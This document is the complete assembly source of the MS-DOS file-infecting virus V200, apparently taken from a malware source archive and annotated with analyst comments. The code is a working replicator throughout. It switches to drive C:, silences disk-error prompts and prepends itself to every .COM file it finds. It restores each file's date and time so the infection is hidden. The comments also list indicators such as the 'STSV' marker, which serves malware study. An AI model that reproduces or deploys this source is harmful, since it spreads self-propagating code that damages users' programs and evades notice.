MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.v200.asm
2021-01-12 18:04:54 -06:00


;------------------------------------------------------------------------------;
; ;
; Virus V200 ;
; ;
; V200 is a parasitic virus; its action consists of the following: when an ;
; infected file is started, the virus searches the whole current directory and ;
; infects all COM files; if the system has a drive C:, these actions are ;
; carried out in that drive's current directory. ;
; V200 places itself before the code of the infected file; the virus sets up ;
; its own procedure for handling critical errors (vector 24h) and does not ;
; change the date and time of the infected files. ;
; ;
;------------------------------------------------------------------------------;
; Assembler setup (MASM/TASM-style directives). Tiny model: code and data share
; one segment, which is the layout of a .COM image.
.model Tiny
.code
VirLen = 200 ; Byte count copied from Start, and the offset of the file read buffer in the copy segment.
NewId = offset Mark - 100h ; Offset of the Mark signature relative to the 100h load address (i.e. its offset inside a file that begins with this code).
;-----------------------------------------------------------------------------;
; Uninitialised scratch variables at offsets 0D0h-0FDh, below the 100h entry point
; (for a .COM program that range lies inside the PSP). Nothing here is part of the
; file image; every field is filled in at run time.
ORG 0D0h
INT24 dw ? ; Vector 24h will be pointed here; Start stores the handler's code bytes in INT24/INT24a.
INT24a db ?
NewDTA db 15h dup (?) ; DTA structure (Start points the DTA here before Find First): 15h leading bytes, then the fields below.
FAttr db ? ; Presumably the file attribute byte; not referenced in this listing.
FTime dw ? ; Passed in CX to AX=5701h after an infection.
FDate dw ? ; Passed in DX to AX=5701h after an infection.
FLen dw ?, ? ; Presumably the file size as two words; not referenced in this listing.
FName db 0Dh dup (?) ; File name used for the open call in FindNext.
;-----------------------------------------------------------------------------;
ORG 100h
; Entry point. In order: saves AX, installs a three-byte critical-error handler,
; records the current drive and switches to C:, copies VirLen bytes of this code
; to the segment 64 KB above CS, points the DTA at NewDTA, and issues Find First
; for '*.COM'. Falls through into FindNext when a file is found.
Start:
push ax ; Saves the AX value present at entry (popped into BX in Done).
mov INT24,3B0h ; New vector 24h : mov al,03 (word 03B0h = bytes B0 03)
mov INT24a,0CFh ; iret
mov ax,2524h
mov dx,offset INT24
int 21h ; Redirects vector 24h to the stub above. The stub returns AL=03 at once (in the INT 24h convention, 3 = fail the call), so a failing disk operation produces no critical-error prompt.
mov ah,19h
int 21h ; Asks DOS for the current drive.
push ax ; Saves the current drive.
mov ah,0Eh
mov dl,02h
int 21h ; Changes the current drive to C: (DL=2).
mov ax,cs
add ah,10h
mov es,ax ; ES = CS + 64KBytes (segment value + 1000h).
mov si,offset Start
xor di,di
mov cx,VirLen ; Copies the virus code 64KBytes
rep movsb ; higher in memory (VirLen bytes from DS:Start to ES:0).
mov dx,offset NewDTA ; Sets the DTA to a new address.
mov ah,1Ah
int 21h
;...... Begins the search for files to infect.
mov dx, offset AllCom ; Searches for all '*.COM' files.
mov cl,110B ; Search attribute bits 1 and 2 (hidden, system); CH is 0 here because rep movsb left CX = 0.
mov ah,4Eh ; Calls Find First.
int 21h
jc Done ; Continues onward (to Done) when there are no
; files to infect.
; Per-file step. Opens the file named in the DTA, reads it into the copy segment
; at offset VirLen (directly behind the VirLen bytes copied there by Start),
; tests for the infection marker, and if it is absent writes the combined
; image back from the start of the file and puts the original time and date back.
; Analyst notes: an infected file grows by VirLen bytes; because the timestamp is
; restored, modification time is not a usable indicator of infection.
FindNext:
mov dx,offset Fname ; dx = address of the file name from the DTA.
mov ax,3D02h ; Opens the file for writing/reading.
int 21h
mov bx,ax ; Saves the handle of the opened file.
push ds ; Saves DS.
push es
pop ds ; The whole file is read to address DS:DX
mov dx,VirLen ; DS = CS + 64KBytes
mov cx,0FFFFh ; DX = the length of the virus
mov ah,3Fh ; The virus is located there, and now, after it,
int 21h ; the file as well.
add ax,VirLen ; Increases the length of the file (AX) by
mov si,ax ; the length of the virus and saves it in SI.
cmp Word ptr ds:[NewId+VirLen],'TS' ; Is the file already infected? Compares the word at file offset NewId with 'TS' (presumably the bytes 'S','T' in memory, i.e. the first two bytes of Mark - confirm for the assembler used).
je Close
xor cx,cx
xor dx,dx
mov ax,4200h ; The file pointer is moved to
int 21h ; its beginning.
mov cx,si
mov ah,40h ; From address DS:DX (DX is 0 here), virus + file
int 21h ; are written to disk (SI bytes).
mov cx,cs:FTime
mov dx,cs:FDate
mov ax,5701h ; The date and time of the
int 21h ; infected file are restored from the DTA.
; Reached both after an infection and directly when the marker test matched:
; restores DS, closes the handle in BX and asks for the next matching file.
Close:
pop ds ; Restores DS.
mov ah,3Eh ; Closes the file.
int 21h
mov ah,4Fh
int 21h ; Calls Find Next;
jnc FindNext ; if there are more files, everything is repeated
; for them as well.
; Clean-up and hand-off. Puts the DTA back at 80h, reselects the drive saved in
; Start, copies the TransF..EndCode helper to ES:0 (overwriting the earlier copy
; there) and far-returns into it.
Done:
mov dx,80h
mov ah,1Ah
int 21h ; The old DTA address (80h) is restored.
pop dx ; Drive number pushed in Start (returned in AL by AH=19h).
mov ah,0Eh
int 21h ; The drive that was current at entry is restored.
;....... Start of launching the program to which the virus is attached.
mov si,offset TransF
mov cx,offset EndCode - offset Transf
xor di,di ; Copies 64KBytes higher an
rep movsb ; auxiliary part, used below.
pop bx ; Restores the contents of AX (pushed at entry) into BX.
push es
push cx ; CX is 0 after rep movsb, so the far-return target is ES:0000.
RETF ; Goes to address ES:00
;.......................................
; Marker for recognizing infected files. FindNext tests the word at file offset
; NewId (= offset Mark - 100h) against it, so this literal sits at a fixed
; position in every file carrying the code and can serve as a static indicator.
Mark DB 'STSV'
AllCom db '*.COM',0 ; Mask for searching all files
;.......................................; to infect.
; Helper that runs from the copy placed at ES:0 by Done (DS still addresses the
; original segment). Moves the bytes that follow the virus (from offset EndCode)
; down to offset Start (100h), then far-returns to DS:100h with AX restored.
; On entry: CX = 0 (left by rep movsb in Done), BX = AX value saved at entry.
TRansF:
push ds
pop es ; ES = DS: source and destination are in the same segment.
mov si,offset EndCode
mov di,offset Start
dec cx ; CX: 0 -> 0FFFFh
sub cx,si ; Moves the code of the program that begins
rep movsb ; immediately after the virus
; down to offset 100h (0FFFFh - offset EndCode bytes).
push ds
mov ax,100h
push ax
mov ax,bx ; Restores the contents of AX.
RETF ; Passes control to the program
; at address DS:100h.
;-----------------------------------------------------------------------------;
; End of the code that is prepended; whatever follows this label is treated as the host.
EndCode:
int 20h ; From here the infected program begins (in this listing the host is only a terminate call).
End Start